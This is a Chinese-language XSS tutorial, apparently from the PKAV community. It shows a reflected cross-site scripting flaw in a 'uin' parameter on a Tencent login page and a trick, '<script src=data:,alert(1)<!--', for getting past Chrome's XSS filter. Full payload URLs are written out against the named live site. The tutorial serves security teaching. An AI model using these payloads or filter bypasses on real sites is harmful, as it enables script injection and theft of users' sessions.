作者:心伤的瘦子
来自:PKAV技术宅社区
网址:http://www.pkav.net
--------------------------------------------------------------
简要描述:
关于反射型的基本东西,暂时就到这啦,如果后面有什么好的case,再做增补。最近,有些人会问到怎么绕过浏览器的XSS过滤器,所以从这节开始,给出点绕过的例子。当然这些绕过浏览器的方法,不是万能的。不同浏览器,不同场景都会存在差异。满足场景要求时,才可以使用。
IE的一些绕过见乌云上的 @gainover,@sogili 的例子,我们教程就不再提及了。
此文给出的是一个来自sogili分享的chrome下绕过过滤器的方法,在腾讯某处XSS上的应用。
这一类都算是“结合了一定场景”,绕过了浏览器自身的防御机制,具有一定的通用性,我们称为“通用绕过”(瞎起的名字,别在意)。但是在后续版本的浏览器中,这些技巧可能会被浏览器干掉从而失效。再次强调:通用不是全部都行,意思是所适用的场景实际发生的概率比较高!
详细说明:
1. 其实就是个普通的XSS点,uin参数没有对任何字符进行过滤。
http://bangbang.qq.com/php/login?game=roco&uin="><img src=1 onerror=alert(1)>&world=5&roleid=44583443&level=8&role=%2
2. 正是由于这个点什么都没过滤,浏览器自身的防御机制也最好发挥作用,瞧瞧,chrome拦截了。。
有的新手,不知道有过滤器的,更是会觉得 “啊,这是怎么回事,怎么不行啊,明明可以的。。”
我们只要看到console里有上面那句,就说明 chrome的过滤器大发神威了!!
3. 我们也看看源码。
危害部分被和谐了。
4. 那么怎么绕过呢? 这里直接说方法。
5. 首先要求缺陷点,允许 < , > 。其次,要求缺陷点的后方存在 </script> 标签。 我们看看当前的这个点的代码。
...
<input type="hidden" id="sClientUin" value=""><img src=1 onerror=alert(1)>">
...
<script type="text/javascript" src="http://pingjs.qq.com/tcss.ping.js"></script>
...
6. 可以看到上面的要求均满足。我们就可以使用以下技巧。
<script src=data:,alert(1)<!--
7. 代入到我们的利用代码里。
http://bangbang.qq.com/php/login?game=roco&uin="><script src=data:,alert(1)<!--&world=5&roleid=44583443&level=8&role=%2
这次,我们就成功啦。(笔记:???什么原理?这是什么鬼操作??)
漏洞证明:
见详细说明
修复方案:
参见教程1